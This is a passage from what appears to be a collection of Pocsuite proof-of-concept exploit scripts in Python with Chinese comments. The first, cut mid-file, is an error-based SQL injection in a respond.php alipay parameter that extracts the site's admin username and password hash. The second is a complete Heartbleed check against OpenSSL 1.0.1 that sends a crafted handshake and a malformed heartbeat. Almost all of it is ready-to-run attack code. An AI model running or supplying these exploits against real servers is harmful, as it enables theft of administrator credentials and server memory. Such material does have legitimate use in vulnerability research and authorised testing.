81 | if table_pre is None:
82 | return self.parse_attack(result)
83 | #获取url
84 | data = "respond.php?code=alipay&subject=0&out_trade_no=%00' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(CHAR(126),CHAR(126),CHAR(126),user_name,CHAR(124),CHAR(124),CHAR(124),password,CHAR(126),CHAR(126),CHAR(126)) from {table_pre}_admin_user limit 1))a from information_schema.tables group by a)b%23".format(table_pre=table_pre)
85 | url = self.get_standard_url(data,self.url)
86 |
87 | pattern = re.compile(r"~~~(\w+?)\|\|\|(\w+?)~~~")
88 |
89 | for i in range(10):
90 | r = req.get(url)
91 | re_result = pattern.findall(r.content.decode(r.encoding))
92 | if re_result:
93 | result['AdminInfo'] = {}
94 | result['AdminInfo']['Username'] = re_result[0][0]
95 | result['AdminInfo']['Password'] = re_result[0][1]
96 | return self.parse_attack(result)
97 | return self.parse_attack(result)
98 | except:
99 | import traceback
100 | traceback.print_exc()
101 |
102 | def _verify(self, verify=True):
103 | try:
104 | result = {}
105 | payload = "/respond.php?code=alipay&subject=0&out_trade_no=%00' union select 1 from (select count(*),concat(floor(rand()*2),(select md5(123456)))a from information_schema.tables group by a)b%23"
106 | vulurl = self.url + payload
107 |
108 | '''
109 | 本地测试的时候,存在不稳定的情况,
110 | 可能是MySQL的bug,使用循环减少误报
111 | '''
112 | for i in range(10):
113 | respond = req.get(vulurl)
114 | if 'e10adc3949ba59abbe56e057f20f883e' in respond.content:
115 | result['VerifyInfo'] = {}
116 | result['VerifyInfo']['URL'] = vulurl
117 | return self.parse_attack(result)
118 | return self.parse_attack(result)
119 | except:
120 | import traceback
121 | traceback.print_exc()
122 |
123 | def parse_attack(self, result):
124 | output = Output(self)
125 | if result:
126 | output.success(result)
127 | else:
128 | output.fail('Internet nothing returned')
129 | return output
130 |
131 | register(TestPOC)
--------------------------------------------------------------------------------
/_140408_OpenSSL_102_Heartbleed.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 |
4 |
5 | import sys
6 | import struct
7 | import socket
8 | import time
9 | import select
10 | import re
11 | from pocsuite.net import req
12 | from pocsuite.poc import Output, POCBase
13 | from pocsuite.utils import register
14 |
15 |
16 | def request2bin(x):
17 | return x.replace(' ', '').replace('\n', '').decode('hex')
18 |
19 |
20 | client_key_exchange = request2bin('''
21 | 16 03 02 00 dc 01 00 00 d8 03 02 53
22 | 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
23 | bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
24 | 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
25 | 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
26 | c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
27 | c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
28 | c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
29 | c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
30 | 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
31 | 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
32 | 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
33 | 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
34 | 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
35 | 00 0f 00 01 01
36 | ''')
37 |
38 |
39 | malformed_heartbeat = request2bin('''
40 | 18 03 02 00 03
41 | 01 40 00
42 | ''')
43 |
44 |
45 | def get_msg_from_socket(some_socket, msg_length, time_out=5):
46 |
47 | end_time = time.time() + time_out
48 |
49 | received_data = ''
50 |
51 | remaining_msg = msg_length
52 |
53 | while remaining_msg > 0:
54 |
55 | read_time = end_time - time.time()
56 |
57 | if read_time < 0:
58 | return None
59 | read_socket, write_socket, error_socket = select.select([some_socket], [], [], time_out)
60 |
61 | if some_socket in read_socket:
62 |
63 | data = some_socket.recv(remaining_msg)
64 |
65 | if not data:
66 | return None
67 |
68 | else:
69 | received_data += data
70 | remaining_msg -= len(data)
71 |
72 | else:
73 | pass
74 |
75 | return received_data
76 |
77 |
78 | def recv_msg(a_socket):
79 |
80 | header = get_msg_from_socket(a_socket, 5)
81 |
82 | if header is None:
83 | return None, None, None
84 |
85 | message_type, message_version, message_length = struct.unpack('>BHH', header)
86 | message_payload = get_msg_from_socket(a_socket, message_length, 10)
87 |
88 | if message_payload is None:
89 | return None, None, None
90 |
91 | return message_type, message_version, message_payload
92 |
93 |
94 | def send_n_catch_heartbeat(our_socket):
95 |
96 | our_socket.send(malformed_heartbeat)
97 |
98 | while True:
99 |
100 | content_type, content_version, content_payload = recv_msg(our_socket)
101 |
102 | if content_type is None:
103 | return False
104 |
105 | if content_type == 24:
106 | return True
107 |
108 | if content_type == 21:
109 | return False
110 |
111 |
112 | def main(rhost):
113 |
114 | local_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
115 | ip, port = rhost[8:].split(':')
116 | local_socket.connect((ip, int(port)))
117 | local_socket.send(client_key_exchange)
118 |
119 | while True:
120 | type, version, payload = recv_msg(local_socket)
121 | if not type:
122 | return
123 | if type == 22 and ord(payload[0]) == 0x0E:
124 | break
125 |
126 | local_socket.send(malformed_heartbeat)
127 | return send_n_catch_heartbeat(local_socket)
128 |
129 |
130 | class TestPOC(POCBase):
131 | vulID = '1219'
132 | version = '1'
133 | author = 'zhangl'
134 | vulDate = '2014-04-08'
135 | createDate = '2014-04-08'
136 | updateDate = '2014-04-08'
137 | references = ['http://drops.wooyun.org/papers/1381']
138 | name = 'Openssl 1.0.1 内存读取 信息泄露漏洞'
139 | appPowerLink = 'https://www.openssl.org/'
140 | appName = 'OpenSSL'
141 | appVersion = '1.0.1~1.0.1f, 1.0.2-beta, 1.0.2-beta1'
142 | vulType = 'Information Disclosure'
143 | desc = '''
144 | OpenSSL是一个强大的安全套接字层密码库。
145 | 这次漏洞被称为OpenSSL“心脏出血”漏洞,这是关于 OpenSSL 的信息泄漏漏洞导致的安全问题。它使攻击者能够从内存中读取最多64 KB的数据。
146 | 安全人员表示:无需任何特权信息或身份验证,我们就可以从我们自己的(测试机上)偷来X.509证书的私钥、用户名与密码、聊天工具的消息、电子邮件以及重要的商业文档和通信等数据。
147 | '''
148 | # the sample sites for examine
149 | samples = ['']
150 |
151 | def _verify(self):
152 | # print self.url
153 | response = main(self.url)
154 | return self.parse_attack(response)
155 |
156 | def _attack(self):
157 | return self._verify()
158 |
159 | def parse_attack(self, response):
160 | output = Output(self)
161 | result = {}
162 |
163 | if response:
164 | result['VerifyInfo'] = {}
165 | result['VerifyInfo']['URL'] = '%s' % self.url
166 | output.success(result)
167 | else:
168 | output.fail('Fail test')
169 |
170 | return output
171 |
172 |
173 | register(TestPOC)
--------------------------------------------------------------------------------